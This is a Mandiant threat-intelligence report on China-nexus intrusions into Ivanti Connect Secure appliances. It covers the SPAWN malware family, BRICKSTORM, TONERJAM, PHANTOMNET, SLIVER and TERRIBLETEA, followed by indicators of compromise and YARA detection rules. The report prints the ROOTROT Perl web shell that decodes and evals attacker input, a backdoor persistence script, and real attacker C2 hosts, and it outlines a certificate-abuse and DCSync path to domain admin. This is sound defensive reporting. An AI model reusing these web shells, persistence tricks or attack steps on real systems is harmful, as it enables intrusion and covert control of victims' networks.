UNC5337 is a suspected China-nexus espionage actor that compromised Ivanti Connect Secure VPN appliances as early as Jan. 2024. UNC5337 is suspected to exploit CVE-2023-46805 (authentication bypass) and CVE-2024-21887 (command injection) for infecting Ivanti Connect Secure appliances. UNC5337 leveraged multiple custom malware families including the SPAWNSNAIL passive backdoor, SPAWNMOLE tunneler, SPAWNANT installer, and SPAWNSLOTH log tampering utility. Mandiant suspects with medium confidence that UNC5337 is UNC5221. 

\n

UNC5291

\n

UNC5291 is a cluster of targeted probing activity that we assess with moderate confidence is associated with UNC3236, also known publicly as Volt Typhoon. Activity for this cluster started in December 2023 focusing on Citrix Netscaler ADC and then shifted to focus on Ivanti Connect Secure devices after details were made public in mid-Jan. 2024. Probing has been observed against the academic, energy, defense, and health sectors, which aligns with past Volt Typhoon interest in critical infrastructure. In Feb. 2024, the Cybersecurity and Infrastructure Security Agency (CISA) released an advisory warning that Volt Typhoon was targeting critical infrastructure and was potentially interested in Ivanti Connect Secure devices for initial access.

\n

New TTPs and Malware

\n

Since our last blog on Ivanti exploitation, Mandiant has identified additional TTPs used by threat actors to gain access to target environments and move laterally within them. Additionally, Mandiant has identified several new code families leveraged by threat actors following the exploitation of Ivanti Connect Secure appliances. Of these code families, several are assessed to be custom malware families; however, Mandiant has also identified the use of open-source tooling, such as SLIVER and CrackMapExec.

\n

SPAWN Malware Family

\n

During analysis of an Ivanti Connect Secure appliance compromised by UNC5221, Mandiant discovered four distinct malware families that work closely together to create a stealthy and persistent backdoor on an infected appliance. Mandiant assesses that these malware families are designed to enable long-term access and avoid detection. 

\n

Figure 1 illustrates how the SPAWN malware family operates.

\n
\n\n\n\n\n\n\n \n
\n
\n \n\n
\n\n \n \n \n \n \n \n \n

Figure 1: SPAWN malware family diagram

\n \n
\n\n \n
\n
\n \n\n\n\n\n
\n

SPAWNANT

\n

SPAWNANT is an installer that leverages a coreboot installer function to establish persistence for the SPAWNMOLE tunneler and SPAWNSNAIL backdoor. It hijacks a legitimate dspkginstall installer process and exports an sprintf function adding a malicious code to it before redirecting a flow back to vsnprintf.

\n

SPAWNMOLE

\n

SPAWNMOLE is a tunneler that injects into the web process. It hijacks the accept function in the web process to monitor traffic and filter out malicious traffic originating from the attacker. The remainder of the benign traffic is passed unmodified to the legitimate web server functions. The malicious traffic is tunneled to a host provided by an attacker in the buffer. Mandiant assesses the attacker would most likely pass a local port where SPAWNSNAIL is operating to access the backdoor.

\n
    \n
  • \n

    The malware attempts to inject itself into a process named web.

    \n
  • \n
  • \n

    The malware attempts to hijack the accept API from the libc binary within web process.

    \n
  • \n
  • \n

    The malware is specifically compiled as a PIE (Position Independent Executable) in order to use a third-party library for injection.

    \n
  • \n
  • \n

    The malware traffic must start with a header that contains 0xfb49e3e2 at offset 0x13 and 0x1bc38361 at offset 0x1b of the received buffer.

    \n
  • \n
\n

SPAWNSNAIL

\n

SPAWNSNAIL (libdsmeeting.so) is a backdoor that listens on localhost. It is designed to run by injecting into the dsmdm process (process responsible for supporting mobile device management features). It creates a backdoor by exposing a limited SSH server on localhost port 8300. We assess that the attacker uses the SPAWNMOLE tunneler to interact with SPAWNSNAIL.

\n

SPAWNSNAIL's second purpose is to inject SPAWNSLOTH (.liblogblock.so) into dslogserver, a process supporting event logging on Connect Secure.

\n

SPAWNSNAIL checks if its binary name is dsmdm; if it is running under that name, it creates two threads:

\n
    \n
  1. \n

    First thread drops a hard-coded SSH host private key to /tmp/.dskey, configures libssh to use the key, and then deletes /tmp/.dskey. The malware binds to localhost on port 8300.

    \n
  2. \n
      \n
    1. \n

      The SSH server requires public key authentication.

      \n
    2. \n
    3. \n

      When starting an interactive shell session, the malware prints a banner with statistics about the system. It will print the information about the release, uptime, current time, and whether SELinux is enabled. SPAWNSNAIL then executes an interactive bash shell.

      \n
    4. \n
    \n
  3. \n

    The second thread injects a log tampering utility, SPAWNSLOTH (/tmp/.liblogblock.so), into the dslogserver process up to three times.

    \n
  4. \n
\n

SPAWNSLOTH

\n

SPAWNSLOTH is a log tampering utility injected into the dslogserver process. It can disable logging and disable log forwarding to an external syslog server when the SPAWNSNAIL backdoor is operating.

\n

SPAWNSLOTH uses funchook to hook the _ZN5DSLog4File3addEPKci function (it is assumed to be a logging function of dslogserver). It also modifies the g_do_syslog_servers_exist_p symbol. This is a pointer to a global variable controlling if event logs should be forwarded to an external syslog server.

\n

Finally, it uses interprocess communication via shared memory to communicate with the SPAWNSNAIL backdoor. SPAWNSLOTH only blocks logging when SPAWNSNAIL is running.

\n

Getting to the Root of It

\n

During the investigation of an Ivanti Connect Secure appliance compromised by UNC5221, Mandiant identified a new web shell we are tracking as ROOTROT. ROOTROT is a web shell written in Perl embedded into a legitimate Connect Secure .ttc file located at /data/runtime/tmp/tt/setcookie.thtml.ttc by exploiting CVE-2023-46805 and CVE-2024-21887. setcookie.thtml.ttc is located on a writable partition on the appliance, and the same file was abused in previous Pulse Connect Secure exploitation events involving CVE-2019-11539 and CVE-2020-8218.

\n

Figure 2 shows the code inserted into the setcookie.thmtl.ttc file that contains ROOTROT. The web shell can be accessed at /dana-na/auth/setcookie.cgi. It parses the issued decoded Base64-encoded command and executes it with eval

\n
   $output .=  \"</body>\\n\\n</html>\\n\";\n        $output .= \"<!--\\n\";\n        my $key = CGI::param('[REDACTED]');\n        use MIME::Base64;\n        if(defined($key)){\n                my $arg=decode_base64(\"$key\");\n                eval($arg);\n        }\n        $output .= \"-->\\n\";\n        } };\n        if ($@) {\n            $error = $context->catch($@, \\$output);\n            die $error unless $error->type eq 'return';\n        }\n    \n        return $output;\n    },
\n

Figure 2: Code block inserted into the setcookie.thtml.ttc file

\n

During the investigation, Mandiant identified that the web shell was created on the system prior to the public disclosure of the associated CVEs on Jan. 10, 2024, indicating a more targeted attack. Defenders can detect the presence of ROOTROT by the existence of  <!--\\n and -->\\n at the end of the response from /dana-na/auth/setcookie.cgi

\n

As of April 3, 2024, the latest external ICT will detect modifications to setcookie.thtml.ttc.

\n

Lateral Movement Leading to vCenter Compromise

\n

Once UNC5221 deployed ROOTROT on a Connect Secure appliance and established a foothold, they initiated network reconnaissance against the victim's network and moved laterally to a VMware vCenter server. Mandiant identified that UNC5221 first moved laterally using the vCenter web console, then later using SSH. 

\n

After moving laterally to the vCenter server, UNC5221 created a new virtual machine three times in vCenter, utilizing a naming convention consistent with other servers in the environment. Though the virtual machine creation was successful, Mandiant did not identify evidence of UNC5221 successfully running or using the virtual machine.

\n

Following this, UNC5221 accessed the vCenter appliance using SSH and downloaded the BRICKSTORM backdoor to the appliance (/home/vsphere-ui/vcli). Notably, BRICKSTORM appears to masquerade as a legitimate vCenter process, vami-http

\n

BRICKSTORM

\n

BRICKSTORM is a Go backdoor targeting VMware vCenter servers. It supports the ability to set itself up as a web server, perform file system and directory manipulation, perform file operations such as upload/download, run shell commands, and perform SOCKS relaying. BRICKSTORM communicates over WebSockets to a hard-coded C2.

\n

Upon execution, BRICKSTORM checks for an environment variable, WRITE_LOG, to determine if the file needs to be executed as a child process. If the variable returns false or is unset, it will copy the BRICKSTORM sample from /home/vsphere-ui/vcli to /opt/vmware/sbin as vami-httpd. It will then execute the copied BRICKSTORM sample and terminate execution.

\n

 If WRITE_LOG is set to true, it assumes it is running as the correct process, deletes /opt/vmware/sbin/vami-httpd, and continues execution.

\n

BRICKSTORM contains a separate function called Watcher, which contains self-monitoring functionality. If the environment variable WORKER returns false or is unset, it will continue the monitoring, checking for the file /home/vsphere-ui/vcli and copying the contents over to /opt/vmware/sbin/vami-httpd. Then, it sets the appropriate environment variables and spawns the process. The watcher process then begins monitoring the exit status of the child process.

\n

If it finds the environment variable WORKER is set to true, it assumes it is a spawned worker process meant to execute the backdoor functionality and skips the remainder of the Watcher function.

\n

BRICKSTORM communicates with the C2 using WebSockets. This sample contains a hard-coded WebSocket address of  wss://opra1.oprawh.workers[.]dev. Additionally, it contains the following legitimate DNS over HTTPS (DoH) addresses.

\n
https://9.9.9.9/dns-query\nhttps://45.90.28.160/dns-query\nhttps://45.90.30.160/dns-query\nhttps://149.112.112.112/dns-query\nhttps://9.9.9.11/dns-query\nhttps://1.1.1.1/dns-query\nhttps://1.0.0.1/dns-query\nhttps://8.8.8.8/dns-query\nhttps://8.8.4.4/dns-query
\n

Figure 3: DNS over HTTPS addresses

\n

BRICKSTORM appears to leverage a custom Go package called wssoft. There is no known, publicly available Go package with this name. It appears this may be the main package developed by the malware authors to perform task processing and connection handling for the malware.

\n

Table 1 provides the four core functions provided by wssoft.

\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
\n

Function

\n
\n

Comments

\n
\n

Spawning a web server

\n
\n

See below for accepted routes/endpoints

\n
\n

Command execution

\n
\n

Executes shell commands using /bin/sh

\n
\n

Command execution (“NoContext”)

\n
\n

Executes shell commands using calls to os. Exec

\n

likely accepts commands run_shell and exit

\n
\n

SOCKS relaying

\n
\n

Connection proxying

\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n

Table 1: wssoft capabilities

\n

When the backdoor functionality is activated, it spawns a web server to handle incoming commands. It uses Gorilla/mux to handle the endpoint routing and lonnng/nex to marshal the data into JSON.

\n

Table 2 provides the endpoints used for communications to the BRICKSTORM backdoor via POST requests.

\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
\n

Endpoint

\n
\n

Function

\n
\n

/api/file/change-dir

\n
\n

Change directory

\n
\n

/api/file/delete-dir

\n
\n

Deletes a directory

\n
\n

/api/file/delete-file

\n
\n

Deletes a file

\n
\n

/api/file/mkdir

\n
\n

Makes a directory (create subdirectories as necessary)

\n
\n

/api/file/list-dir

\n
\n

Lists directory contents

\n
\n

/api/file/rename

\n
\n

Renames a file

\n
\n

/api/file/put-file

\n
\n

File upload given a destination path, can optionally append to file

\n
\n

/api/file/get-file

\n
\n

File download

\n
\n

/api/file/slice-up

\n
\n

May upload large files in separate chunks

\n
\n

/api/file/file-md5

\n
\n

Calculates file MD5

\n
\n

/api/file/up

\n
\n

Uploads a file using a web form (includes SHA256 hashing)

\n
\n

/api/file/stat

\n
\n

Gets file information

\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n

Table 2: BRICKSTORM endpoints

\n

Lateral Movement Leading to Active Directory Compromise

\n

UNC5330 gained initial access to the victim environment by chaining together CVE-2024-21893 and CVE-2024-21887, a tactic outlined in Cutting Edge Part 3. Shortly after gaining access, UNC5330 leveraged an LDAP bind account configured on the compromised Ivanti Connect Secure appliance to abuse a vulnerable Windows Certificate Template, created a computer object, and requested a certificate for a domain administrator. The threat actor then impersonated the domain administrator to perform subsequent DCSyncs to extract additional credential material to move laterally.

\n

Attack Path Diagram

\n
\n\n\n\n\n\n\n \n
\n
\n \n\n
\n\n \n \n \n \n \n \n \n

Figure 4: UNC5330 attack path diagram

\n \n
\n\n \n
\n
\n \n\n\n\n\n
\n

Windows Certificate Template Abuse 

\n

UNC5330 used the ldap-ivanti account, configured on the Ivanti appliance for LDAP bind operations, to create a domain computer object, testComputer$. UNC5330 used the newly created testComputer$ computer object to request a certificate from a vulnerable certificate template that provided enrollment rights to Domain Computers. UNC5330 requested a certificate for a domain administrator account, obtained a Kerberos TGT using the certificate, and performed DCSync attacks to obtain additional domain credentials for enabling lateral movement.

\n

Once domain admin access was achieved, UNC5330 leveraged WMI to deploy the TONERJAM launcher and the PHANTOMNET backdoor.

\n

WMI Event Consumers

\n

WMI was used to perform lateral movement and establish persistence within the victim environment, primarily by creating and executing scheduled tasks that were subsequently removed. The ActiveScript event consumers performed the following:

\n
    \n
  1. \n

    Created and registered a scheduled task with trigger type 7 (started the task upon registration) to execute command with cmd.exe.

    \n
  2. \n
  3. \n

    Wrote command output to a .log file in C:\\Windows\\Temp.

    \n
  4. \n
  5. \n

    Deleted the scheduled task.

    \n
  6. \n
\n

The behavior, as well as the naming convention used for both the WMI artifacts and output files, is consistent with a recent version of CrackMapExec that implements DCE/RPC for WMI execution that does not rely on SMB. Mandiant observed this technique being used to deploy TONERJAM and PHANTOMNET.

\n

TONERJAM

\n

TONERJAM is a launcher that decrypts and executes a shellcode payload, in this case PHANTOMNET, stored as an encrypted local file and decrypts it using an AES key derived from a SHA hash of the final 16 bytes of the encrypted payload. TONERJAM maintains persistence via the Run registry key or by hijacking COM objects depending on the permissions granted to it upon execution.

\n

PHANTOMNET

\n

PHANTOMNET is a modular backdoor that communicates using a custom communication protocol over TCP. PHANTOMNET's core functionality involves expanding its capabilities through a plugin management system. The downloaded plugins are mapped directly into memory and executed.

\n

SLIVER C2

\n

During a separate intrusion, UNC5266 retrieved copies of SLIVER from a Python SimpleHTTP server hosted on the same IP address as the configured command-and-control server. The copies of SLIVER were placed in three separate locations on the compromised appliance, attempting to masquerade as legitimate system files. UNC5266 modified a systemd service file to register one of the copies of SLIVER as a persistent daemon.

\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
\n

Path

\n
\n

Description

\n
\n

/home/bin/netmon

\n
\n

SLIVER

\n
\n

/home/bin/logd

\n
\n

SLIVER

\n
\n

/home/runtime/logd

\n
\n

SLIVER

\n
\n

/home/config/logd.spec.cfg

\n
\n

systemd service unit configuration file

\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n

Table 3: SLIVER components

\n

Additionally, UNC5266 leveraged a WARPWIRE variant previously reported in Cutting Edge, Part 2. This variant was downloaded by UNC5266 from what Mandiant believes to be a compromised web server located in Rwanda. See Figure 18 in the Cutting Edge Part 2 blog for details on the WARPWIRE variant.

\n

TERRIBLETEA

\n

At a separate intrusion, UNC5266 used the same WARPWIRE sample as used in their SLIVER operation. However, instead of SLIVER, UNC5266 deployed a Go backdoor that Mandiant has named TERRIBLETEA. During this intrusion, the actor attempted to use curl to download the backdoor; however, logs suggest these attempts failed. Seven minutes after their last failed curl attempt, UNC5266 ran a wget request to an anonymous file sharing site: pan.xj.hk. UNC5266 likely uploaded TERRIBLETEA to the file-sharing site in the intervening seven minutes.

\n

TERRIBLETEA is a Go backdoor that communicates over HTTP using XXTEA for encrypted communications. It is built using multiple open-source Go modules and has a multitude of capabilities including:

\n
    \n
  • \n

    Command execution

    \n
  • \n
  • \n

    Keystroke logging

    \n
  • \n
  • \n

    SOCKS5 proxy

    \n
  • \n
  • \n

    Port scanning

    \n
  • \n
  • \n

    File system interaction

    \n
  • \n
  • \n

    SQL query execution

    \n
  • \n
  • \n

    Screen captures

    \n
  • \n
  • \n

    Ability to open a new SSH session, execute commands, and upload files to a remote server. The following commands may be executed:

    \n
  • \n
      \n
    • \n

      chmod +x /tmp/.udevd

      \n
    • \n
    • \n

      /tmp/.udevd <args>

      \n
    • \n
    • \n

      ls -lahrt /home/

      \n
    • \n
    \n
\n

TERRIBLETEA can take different execution paths depending on what environment it is configured for, either linux_amd64 or darwin_amd64. In this instance, TERRIBLETEA is configured for the linux_amd64 environment. The sample persists with a Bash profile script located at /etc/profile.d/cron.sh for persistence.

\n
# Initialization script for bash and sh\n# export AFS if you are in AFS environment\na=`ps -fe|grep /bin/cron |grep -v grep|wc|awk '{print$1}'`\nif [ \"$a\" -eq 0 ] \nthen\n/bin/cron\nfi
\n

Figure 5: TERRIBLETEA Bash profile script

\n

Outlook and Implications

\n

The activity detailed in this blog, as well as the recently published Cutting Edge, Part 3 highlighting UNC5325 targeting of Ivanti Connect Secure appliances, underscore the threat faced by edge appliances. Mandiant continues to observe China-nexus threat actors aggressively utilizing zero-day and N-day vulnerabilities to enable their operations and target organizations across the globe. 

\n

Mandiant continues to observe a wide range of TTPs following the successful exploitation of vulnerabilities against edge appliances. As previously reported by Mandiant, China-nexus actors continue to evolve their stealth to avoid detection by defenders. While the use of open--source tooling is somewhat common, Mandiant continues to observe actors leveraging custom malware that is tailored to the appliance or environment the actor is targeting.

\n

Indicators of Compromise (IOCs)

\n

Host-Based Indicators (HBIs)

\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
\n

Filename

\n
\n

MD5

\n
\n

Description

\n
\n

data.dat

\n
\n

9d684815bc96508b99e6302e253bc292

\n
\n

PHANTOMNET

\n
\n

epdevmgr.dll

\n
\n

b210a9a9f3587894e5a0f225b3a6519f

\n
\n

TONERJAM

\n
\n

libdsproxy.so

\n
\n

4f79c70cce4207d0ad57a339a9c7f43c

\n
\n

SPAWNMOLE

\n
\n

libdsmeeting.so

\n
\n

e7d24813535f74187db31d4114f607a1

\n
\n

SPAWNSNAIL

\n
\n

.liblogblock.so

\n
\n

4acfc5df7f24c2354384f7449280d9e0 

\n
\n

SPAWNSLOTH

\n
\n

.dskey

\n
\n

3ef30bc3a7e4f5251d8c6e1d3825612d

\n
\n

SPAWNSNAIL private key

\n
\n

N/A

\n
\n

bb3b286f88728060c80ea65993576ef8

\n
\n

TERRIBLETEA

\n
\n

N/A

\n
\n

cfca610934b271c26437c4ce891bad00

\n
\n

TERRIBLETEA

\n
\n

N/A

\n
\n

08a817e0ae51a7b4a44bc6717143f9c2

\n
\n

TERRIBLETEA

\n
\n

linb64.png

\n
\n

e7fdbed34f99c05bb5861910ca4cc994

\n
\n

SLIVER

\n
\n

lint64.png

\n
\n

c251afe252744116219f885980f2caea

\n
\n

SLIVER

\n
\n

linb64.png

\n
\n

4f68862d3170abd510acd5c500e43548

\n
\n

SLIVER

\n
\n

lint64.png

\n
\n

9d0b6276cbc4c8b63c269e1ddc145008

\n
\n

SLIVER

\n
\n

logd

\n
\n

71b4368ef2d91d49820c5b91f33179cb

\n
\n

SLIVER

\n
\n

winb64.png

\n
\n

d88bbed726d79124535e8f4d7de5592e

\n
\n

SLIVER

\n
\n

logd.spec.cfg

\n
\n

846369b3a3d4536008a6e1b92ed09549

\n
\n

SLIVER persistence

\n
\n

N/A

\n
\n

8e429d919e7585de33ea9d7bb29bc86b

\n
\n

SLIVER downloader

\n
\n

N/A

\n
\n

fc1a8f73010f401d6e95a42889f99028

\n
\n

PHANTOMNET

\n
\n

N/A

\n
\n

e72efc0753e6386fbca0a500836a566e

\n
\n

PHANTOMNET

\n
\n

N/A

\n
\n

4645f2f6800bc654d5fa812237896b00

\n
\n

BRICKSTORM

\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n

Table 4: Host-based indicators

\n

Network-Based Indicators (NBIs)

\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
\n

Network Indicator

\n
\n

Type

\n
\n

Description

\n
\n

8.218.240[.]85

\n
\n

IPv4

\n
\n

Post-exploitation activity

\n
\n

98.142.138[.]21

\n
\n

IPv4

\n
\n

Post-exploitation activity

\n
\n

103.13.28[.]40

\n
\n

IPv4

\n
\n

Post-exploitation activity

\n
\n

103.27.110[.]83

\n
\n

IPv4

\n
\n

Post-exploitation activity

\n
\n

103.73.66[.]37

\n
\n

IPv4

\n
\n

Post-exploitation activity

\n
\n

193.149.129[.]191

\n
\n

IPv4

\n
\n

Post-exploitation activity

\n
\n

206.188.196[.]199

\n
\n

IPv4

\n
\n

Post-exploitation activity

\n
\n

oast[.]fun

\n
\n

Domain

\n
\n

Pre-exploitation validation

\n
\n

cpanel.netbar[.]org

\n
\n

Domain

\n
\n

WARPWIRE Variant C2 server

\n
\n

pan.xj[.]hk

\n
\n

Domain

\n
\n

Post-exploitation activity

\n
\n

akapush.us[.]to

\n
\n

Domain

\n
\n

SLIVER C2 server

\n
\n

opra1.oprawh.workers.dev

\n
\n

Domain

\n
\n

BRICKSTORM C2 server

\n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n

Table 5: Network-based indicators

\n

YARA Rules

\n
rule M_Hunting_Webshell_ROOTROT_1 {\n  meta:\n    author = \"Mandiant\"\n    description = \"This rule detects ROOTROT, a web shell written in \nPerl that is embedded into a legitimate Pulse Secure .ttc file to \nenable arbitrary command execution.\"\n    md5 = \"c7ffd2c06e9b7e8e0b7ac92a0dbe3294\"\n  strings:\n    $s1 = \"use MIME::Base64\" ascii\n    $s2 = {6d 79 20 24 61 72 67 3d 64 65 63 6f 64 65 5f 62 61 73 \n65 36 34 28 22 24 6b 65 79 22 29}\n    $s3 = {24 6f 75 74 70 75 74 20 2e 3d 20 22 3c 21 2d 2d 5c 6e \n22 3b}\n    $s4 = {22 3c 2f 62 6f 64 79 3e 5c 6e 5c 6e 3c 2f 68 74 6d 6c 3e \n5c 6e 22}\n  condition:\n    filesize < 4KB\n    and all of them\n}\n
\n
rule M_Hunting_Backdoor_BRICKSTORM_1 {\n  meta:\n    author = \"Mandiant\"\n    created = \"2024-01-30\"\n    md5 = \"4645f2f6800bc654d5fa812237896b00\"\n    descr = \"Hunting rule looking for BRICKSTORM golang backdoor samples\"\n  strings:\n    $v1 = \"/home/vsphere-ui/vcli\" ascii wide\n    $v2 = \"/opt/vmware/sbin\" ascii wide\n    $v3 = \"/opt/vmware/sbin/vami-httpd\" ascii wide\n    $s1 = \"github.com/gorilla/mux\" ascii wide\n    $s2 = \"WRITE_LOG=true\" ascii wide\n    $s3 = \"wssoft\" ascii wide\n    \n  condition:\n    uint32(0) == 0x464c457f and filesize < 6MB and 1 of ($v*) and 2 of ($s*)\n}
\n
import \"pe\"\nrule M_APT_Backdoor_Win_PHANTOMNET_1\n{\n    meta:\n        author = \"Mandiant\"\n        md5 = \"59f4d38a5caafbc94673c6d488bf37e3\"\n\n    strings:\n        $phantomnet = /\\\\PhantomNet-\\w{1,10}\\.pdb/ ascii nocase\n    condition:\n        (uint16(0) == 0x5A4D) and (uint32(uint32(0x3C)) == 0x00004550) \nand all of them\n}\n
\n
rule M_APT_Backdoor_SLIVER_1\n{\n    meta:\n        Author = “Mandiant”\n        description = \"Detects Windows, MacOS and ELF variants \nof the Sliver implant framework\"\n        md5 = \"5ecd0c38501dfb02b682cec0a2d93aa9\"\n\n    strings:\n        $s1 = \".InvokeSpawnDllReq\"\n        $s2 = \".(*InvokeSpawnDllReq).Reset\"\n        $s3 = \".(*InvokeSpawnDllReq).ProtoMessage\"\n        $s4 = \".(*InvokeSpawnDllReq).ProtoReflect\"\n        $s5 = \".(*InvokeSpawnDllReq).Descriptor\"\n        $s6 = \".(*InvokeSpawnDllReq).GetData\"\n        $s7 = \".(*InvokeSpawnDllReq).GetProcessName\"\n        $s8 = \".(*InvokeSpawnDllReq).GetArgs\"\n        $s10 = \".(*InvokeSpawnDllReq).GetKill\"\n        $s11 = \".(*InvokeSpawnDllReq).GetPPid\"\n        $s12 = \".(*InvokeSpawnDllReq).GetProcessArgs\"\n        $s13 = \".(*InvokeSpawnDllReq).GetRequest\"\n        $s14 = \".(*InvokeSpawnDllReq).String\"\n        $s15 = \".(*InvokeSpawnDllReq).GetEntryPoint\"\n\n    condition:\n        ((uint16(0) == 0x5a4d and uint32(uint32(0x3C)) == 0x00004550) \nor uint32(0) == 0x464c457f or (uint32(0) == 0xBEBAFECA or uint32(0) \n== 0xFEEDFACE or uint32(0) == 0xFEEDFACF or uint32(0) == 0xCEFAEDFE)) \nand 5 of ($s*)\n}\n
\n
rule M_APT_Backdoor_TERRIBLETEA_1 {\n    meta:\n        author = \"Mandiant\"\n        description = \"This rule is designed to detect on events related \nto terribletea. TERRIBLETEA is a backdoor written in Go that communicates \nover HTTP. Its many capabilities include shell command execution, \ncapturing screens, keystroke logging, port scanning, enumerating files, \nstarting a SOCKS5 proxy and new SSH session, downloading files, and \nexecuting SQL queries.\"\n        md5 = \"bb3b286f88728060c80ea65993576ef8\"\n    \n    strings:\n        $code_part_of_getcommand = {48 BA 44 61 74 61 31 73 33 6E \n[1-12] 80 7B ?? 64}\n        $code_get_task = { 48 8D  [5] B9 04 00 00 00 48 8B ?? 24 [4] 48 \n8D [5] 41 B8 03 00 00 00 E8}\n        $func1 = \"SendRequest\" fullword\n        $func2 =\"UploadResult\"\n        $func3 =\"Online\"\n        $func4 =\"GetCommond\"\n    condition:\n        all of ($code*) and any of ($func*) and filesize<20MB  \n}\n
\n
rule M_Launcher_TONERJAM_1\n{\n    meta:\n        author = \"Mandiant\"\n        description = \"This rule detects TONERJAM, a launcher that \ndecrypts and executes a shellcode payload stored as an encrypted \nlocal file and decrypts it using an AES key derived from a SHA hash \nof the final 16 bytes of the encrypted payload.\"\n\n    strings:\n        $p00_0 = {e9[4]488b41??668338??75??4883c0??488941??b8[4]eb??b8}\n        $p00_1 = {8030??488d40??41ffc14183f9??72??ba[4]488d4c24??e8[4]488d0d}\n\n    condition:\n        uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and\n        (\n            ($p00_0 in (17000..28000) and $p00_1 in (3700..14000))\n        )\n}\n
\n
rule M_APT_Installer_SPAWNSNAIL_1\n{ \n    meta: \n        author = \"Mandiant\" \n        description = \"Detects SPAWNSNAIL. SPAWNSNAIL is an SSH \nbackdoor targeting Ivanti devices. It has an ability to inject a specified \nbinary to other process, running local SSH backdoor when injected to \ndsmdm process, as well as injecting additional malware to dslogserver\" \n        md5 = \"e7d24813535f74187db31d4114f607a1\"\n  \n    strings: \n        $priv = \"PRIVATE KEY-----\" ascii fullword\n        \n        $key1 = \"%d/id_ed25519\" ascii fullword\n        $key2 = \"%d/id_ecdsa\" ascii fullword\n        $key3 = \"%d/id_rsa\" ascii fullword\n        \n        $sl1 = \"[selinux] enforce\" ascii fullword\n        $sl2 = \"DSVersion::getReleaseStr()\" ascii fullword\n        \n        $ssh1 = \"ssh_set_server_callbacks\" ascii fullword\n        $ssh2 = \"ssh_handle_key_exchange\" ascii fullword\n        $ssh3 = \"ssh_add_set_channel_callbacks\" ascii fullword\n        $ssh4 = \"ssh_channel_close\" ascii fullword\n    \n    condition: \n        uint32(0) == 0x464c457f and $priv and any of ($key*) \nand any of ($sl*) and any of ($ssh*)\n} 
\n
rule M_APT_Installer_SPAWNANT_1\n{ \n    meta: \n        author = \"Mandiant\" \n        description = \"Detects SPAWNANT. SPAWNANT is an \nInstaller targeting Ivanti devices. Its purpose is to persistently \ninstall other malware from the SPAWN family (SPAWNSNAIL, \nSPAWNMOLE) as well as drop additional webshells on the box.\" \n  \n    strings: \n        $s1 = \"dspkginstall\" ascii fullword\n        $s2 = \"vsnprintf\" ascii fullword\n        $s3 = \"bom_files\" ascii fullword\n        $s4 = \"do-install\" ascii\n        $s5 = \"ld.so.preload\" ascii\n        $s6 = \"LD_PRELOAD\" ascii\n        $s7 = \"scanner.py\" ascii\n        \n    condition: \n        uint32(0) == 0x464c457f and 5 of ($s*)\n}\n
\n
rule M_APT_Tunneler_SPAWNMOLE_1\n{ \n    meta: \n        author = \"Mandiant\" \n        description = \"Detects a specific comparisons in SPAWNMOLE \ntunneler, which allow malware to filter put its own traffic . \nSPAWNMOLE is a tunneler written in C and compiled as an ELF32 \nexecutable. The sample is capable of hijacking a process on the \ncompromised system with a specific name and hooking into its \ncommunication capabilities in order to create a proxy server for \ntunneling traffic.\" \n        md5 = \"4f79c70cce4207d0ad57a339a9c7f43c\"\n  \n    strings: \n        /*\n        3C 16                                cmp     al, 16h\n        74 14                                jz      short loc_5655C038\n        0F B6 45 C1                          movzx   eax, [ebp+var_3F]\n        3C 03                                cmp     al, 3\n        74 0C                                jz      short loc_5655C038\n        0F B6 45 C5                          movzx   eax, [ebp+var_3B]\n        3C 01                                cmp     al, 1\n        0F 85 ED 00 00 00                    jnz     loc_5655C125\n        */\n\n\n        $comparison1 = { 3C 16 74 [1] 0F B6 [2] 3C 03 74 [1] 0F B6 [2] \n3C 01 0F 85 }\n\n        /*\n        81 7D E8 E2 E3 49 FB                 cmp     [ebp+var_18], 0FB49E3E2h\n        0F 85 CD 00 00 00                    jnz     loc_5655C128\n        81 7D E4 61 83 C3 1B                 cmp     [ebp+var_1C], 1BC38361h\n        0F 85 C0 00 00 00                    jnz     loc_5655C128\n        */\n\n        $comparison2 = { 81 [2] E2 E3 49 FB 0F 85 [4] 81 [2] 61 83 C3 \n1B 0F 85}\n        \n  \n    condition: \n        uint32(0) == 0x464c457f and all of them\n}\n
\n
rule M_APT_Utility_SPAWNSLOTH_1\n{ \n    meta: \n        author = \"Mandiant\" \n        description = \"Detects SPAWNSLOTH. SPAWNSLOTH \nis an Utility targeting Ivanti devices. Its purpose is to work \ntogether with SPAWNSNAIL and block logging via dslogserver \nprocess when SPAWNSNAIL backdoor is active.\" \n        md5 = \"4acfc5df7f24c2354384f7449280d9e0\"\n  \n    strings: \n        $dslog = \"dslogserver\" ascii fullword\n\n        $hook1 = \"g_do_syslog_servers_exist\" ascii fullword\n        $hook2 = \"_ZN5DSLog4File3addEPKci\" ascii fullword\n        $hook3 = \"funchook_create\" ascii fullword\n    \n    condition: \n        uint32(0) == 0x464c457f and all of them\n}\n
",
"content"=>nil,
"author"=>"Mandiant ",
